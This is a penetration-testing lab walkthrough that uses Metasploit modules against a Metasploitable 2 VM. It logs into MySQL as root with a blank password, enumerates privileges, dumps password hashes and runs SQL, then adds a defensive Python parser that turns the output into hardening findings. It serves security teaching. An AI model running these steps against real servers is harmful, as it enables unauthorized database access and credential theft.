MySQL / MariaDB Default Credentials (MySQL Protocol)
Note: these labs are strongly results-oriented and use step-by-step guidance. As you progress, try to find more information and understand what you are doing.
Note 2: this exploit may not work on more recent versions of the Metasploit Framework.
Requirements
Kali Linux
The Kali Linux VM (or any other type of installation)
Metasploitable 2
The Metasploitable 2 VM
Metasploit Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Laboratory Workflow
The following describes the steps to be conducted during the laboratory. You may introduce variations on them and learn from those variations.
1. Launch the Metasploit Framework
msfconsole
2. Search for the appropriate module
search mysql_login
Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility
3. Use the module
use auxiliary/scanner/mysql/mysql_login
4. Check the module options
options
Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
5. Set the appropriate options
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.142
6. Run the module (an auxiliary login scanner, not an exploit)
run
[+] 192.168.8.142:3306 - 192.168.8.142:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.8.142:3306 - 192.168.8.142:3306 - Success: 'root:'
[*] 192.168.8.142:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
7. Run the MySQL enumerator to get information from the database server
This collects server configuration details and account privilege information from the database.
use auxiliary/admin/mysql/mysql_enum
options
Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306             yes       The target port (TCP)
   USERNAME                   no        The username to authenticate as
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.142
set USERNAME root
USERNAME => root
run
[*] Running module against 192.168.8.142
[*] 192.168.8.142:3306 - Running MySQL Enumerator...
[*] 192.168.8.142:3306 - Enumerating Parameters
[*] 192.168.8.142:3306 - MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.8.142:3306 - Compiled for the following OS: debian-linux-gnu
[*] 192.168.8.142:3306 - Architecture: i486
[*] 192.168.8.142:3306 - Server Hostname: metasploitable
[*] 192.168.8.142:3306 - Data Directory: /var/lib/mysql/
[*] 192.168.8.142:3306 - Logging of queries and logins: OFF
[*] 192.168.8.142:3306 - Old Password Hashing Algorithm OFF
[*] 192.168.8.142:3306 - Loading of local files: ON
[*] 192.168.8.142:3306 - Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.8.142:3306 - Allow Use of symlinks for Database Files: YES
[*] 192.168.8.142:3306 - Allow Table Merge: YES
[*] 192.168.8.142:3306 - SSL Connections: Enabled
[*] 192.168.8.142:3306 - SSL CA Certificate: /etc/mysql/cacert.pem
[*] 192.168.8.142:3306 - SSL Key: /etc/mysql/server-key.pem
[*] 192.168.8.142:3306 - SSL Certificate: /etc/mysql/server-cert.pem
[*] 192.168.8.142:3306 - Enumerating Accounts:
[*] 192.168.8.142:3306 - List of Accounts with Password Hashes:
[+] 192.168.8.142:3306 - User: debian-sys-maint Host: Password Hash:
[+] 192.168.8.142:3306 - User: root Host: % Password Hash:
[+] 192.168.8.142:3306 - User: guest Host: % Password Hash:
[*] 192.168.8.142:3306 - The following users have GRANT Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have CREATE USER Privilege:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have RELOAD Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have SHUTDOWN Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have SUPER Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have FILE Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following users have PROCESS Privilege:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following accounts have privileges to the mysql database:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following accounts have empty passwords:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following accounts are not restricted by source:
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - User: root Host: %
[*] Auxiliary module execution completed
8. Dump database schema
This will access and dump the database schema.
use auxiliary/scanner/mysql/mysql_schemadump
options
Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
   PASSWORD                          no        The password for the specified username
   RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT            3306             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)
   USERNAME                          no        The username to authenticate as
9. Dump password hashes
Try to obtain additional password hashes from the database.
use auxiliary/scanner/mysql/mysql_hashdump
options
Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306             yes       The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME                   no        The username to authenticate as
set USERNAME root
set RHOSTS 192.168.8.142
run
[+] 192.168.8.142:3306 - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.8.142:3306 - Saving HashString as Loot: root:
[+] 192.168.8.142:3306 - Saving HashString as Loot: guest:
[*] 192.168.8.142:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
10. Run MySQL queries
Try to run SQL queries on the database.
use auxiliary/admin/mysql/mysql_sql
options
Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306              yes       The target port (TCP)
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as
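The enumerator output in step 7 is the part of this lab a defender acts on: accounts with empty passwords, accounts reachable from any host (`%`), FILE privilege combined with local file loading, and logging switched off. The following is an added example, not part of the original lab or of Metasploit, that parses that output format and turns it into a list of hardening findings; the sample text is a constructed excerpt of the step 7 output, and the regular expressions assume Metasploit's `[*] host:port - ` line prefix as shown above.

```python
import re
# Constructed sample: an excerpt of the mysql_enum output shown in step 7 above.
SAMPLE = """\
[*] 192.168.8.142:3306 - Loading of local files: ON
[*] 192.168.8.142:3306 - Logging of queries and logins: OFF
[*] 192.168.8.142:3306 - The following users have FILE Privilege:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following accounts have empty passwords:
[*] 192.168.8.142:3306 - User: debian-sys-maint Host:
[*] 192.168.8.142:3306 - User: root Host: %
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - The following accounts are not restricted by source:
[*] 192.168.8.142:3306 - User: guest Host: %
[*] 192.168.8.142:3306 - User: root Host: %
"""
PREFIX = re.compile(r"^\[[*+]\] \S+ - (.*)$")  # strips Metasploit's "[*] host:port - " prefix
SECTION = re.compile(r"^The following (?:users|accounts) (?:have|are) (.+?)(?: Privilege)?:$")
ACCOUNT = re.compile(r"^User: (\S+) Host: ?(\S*?)(?: Password Hash:.*)?$")

def parse_enum(text):
    """Return (settings, sections): parameter name -> value, and finding -> [(user, host)]."""
    settings, sections, current = {}, {}, None
    for raw in text.splitlines():
        m = PREFIX.match(raw.strip())
        line = m.group(1).strip() if m else ""   # lines without the prefix are ignored
        if s := SECTION.match(line):
            current = s.group(1)                 # e.g. "FILE", "empty passwords"
            sections[current] = []
        elif a := ACCOUNT.match(line):
            if current is not None:              # "User: ... Host: ..." lines before any section are hash listings
                sections[current].append((a.group(1), a.group(2)))
        elif ":" in line:
            key, _, value = line.partition(":")  # e.g. "Loading of local files: ON"
            settings[key.strip()] = value.strip()
    return settings, sections

def risk_findings(settings, sections):
    """Translate the parsed output into the items a DBA would fix or monitor."""
    findings = []
    for user, host in sections.get("empty passwords", []):
        findings.append(f"'{user}'@'{host}' has an empty password")
    for user, host in sections.get("not restricted by source", []):
        findings.append(f"'{user}'@'{host}' accepts connections from any source host")
    if settings.get("Loading of local files") == "ON":
        for user, host in sections.get("FILE", []):
            findings.append(f"'{user}'@'{host}' holds FILE privilege while local_infile is ON")
    if settings.get("Logging of queries and logins") == "OFF":
        findings.append("general query log is OFF: logins and queries leave no server-side record")
    return findings
```

Feeding the full step 7 output to `parse_enum` works the same way; the `[+]` hash-listing lines are skipped because they precede any "The following ..." section header.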